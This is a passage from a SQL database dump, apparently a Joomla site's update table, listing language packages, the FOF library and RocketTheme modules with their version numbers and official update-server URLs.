Simplified','','pkg_zh-CN','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(290,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(291,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(292,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(293,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(294,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(295,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(296,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(297,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(298,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(299,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3033',''),(301,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(302,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(303,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(304,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(305,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(306,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(307,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(308,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.5.3','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(309,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(310,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(311,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(312,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(313,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(314,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(315,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(316,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(317,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(318,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(319,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(320,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(321,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(322,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(323,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(324,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(325,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(326,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(327,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(328,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(329,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(330,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(331,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(332,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(333,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(334,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(335,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(336,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(337,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(338,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(339,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(340,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(341,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(342,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(343,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.5.3','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(344,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(345,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(346,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(347,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(348,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(349,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(350,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(351,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(352,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(353,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(354,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(355,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(356,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(357,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(358,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(359,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(360,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(361,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(362,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(363,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(364,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(365,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(366,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(367,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(368,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3033',''),(370,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(371,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(372,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(373,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(374,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(375,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(376,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(377,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.5.3','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(378,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(379,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(380,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(381,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(382,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(383,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(384,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(385,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(386,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(387,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(388,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(389,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(390,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(391,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(392,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(393,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(394,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(395,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(396,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(397,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(398,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(399,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(400,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(401,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(402,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(403,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(404,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(405,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(406,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(407,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(408,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(409,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(410,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(411,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(412,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(413,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(414,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(415,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.5.3','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(416,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(417,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(418,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(419,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(420,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(421,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(422,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(423,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(424,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(425,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(426,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(427,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(428,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(429,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(430,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(431,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(432,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(433,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(434,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(435,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(436,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(437,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(438,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(439,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(440,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(441,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(442,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(443,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3033',''),(445,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(446,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(447,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(448,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(449,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(450,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(451,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(452,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(453,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(454,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(455,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(456,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(457,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(458,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(459,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(460,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(461,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(462,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(463,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(464,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(465,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(466,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(467,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(468,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(469,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(470,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(471,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(472,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(473,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(474,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(475,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(476,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(477,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(478,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(479,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(480,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(481,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(482,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(483,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(484,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(485,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(486,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(487,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(488,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(489,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(490,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(491,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(492,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(493,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(494,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(495,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(496,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(497,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(498,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(499,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(500,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(501,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(502,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(503,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(504,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(505,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(506,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(507,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(508,57,0,'Serbian 